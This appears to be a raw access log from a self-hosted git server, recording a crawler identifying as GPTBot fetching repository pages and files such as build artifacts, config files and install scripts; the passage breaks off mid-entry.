"/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:15:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:15:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:15:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 14748] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:15:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2ffallback_stream_access.log" [Client 74.7.227.38] [Length 21167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:15:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" -[17/Feb/2026:15:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11904] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" -[17/Feb/2026:15:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12891] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" -[17/Feb/2026:15:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 10905] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 10904] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 10875] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 44619] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" -[17/Feb/2026:15:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-7.conf" [Client 74.7.227.38] [Length 22345] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:15:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-1.conf" [Client 74.7.227.38] [Length 22443] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:15:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 15112] [Gzip 8.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" -[17/Feb/2026:15:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" -[17/Feb/2026:15:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 3545] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" -[17/Feb/2026:15:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-4.conf" [Client 74.7.227.38] [Length 22424] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:15:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-2.conf" [Client 74.7.227.38] [Length 22455] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:15:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 32259343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:15:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 32259343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:15:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9529] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:15:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 60353] [Gzip 23.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:15:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 32259343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:15:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9529] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:15:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9529] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:15:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 74447] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:15:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal%2fnpm-6.conf" [Client 74.7.227.38] [Length 22444] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:15:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument" [Client 74.7.227.38] [Length 156403] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:15:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11904] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" -[17/Feb/2026:15:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 12263] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" -[17/Feb/2026:15:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 12289] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" -[17/Feb/2026:15:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 12289] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" -[17/Feb/2026:15:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fApp.tsx" [Client 74.7.227.38] [Length 24699] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" -[17/Feb/2026:15:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2findex.html" [Client 74.7.227.38] [Length 26338] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" -[17/Feb/2026:15:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" -[17/Feb/2026:15:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15602] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:15:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" -[17/Feb/2026:15:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:15:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 12013] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" -[17/Feb/2026:15:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10467] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:15:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:15:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 11547] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:15:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 1127] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:15:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 11547] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:15:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:15:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 11517] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:15:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 1127] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:15:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 1127] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 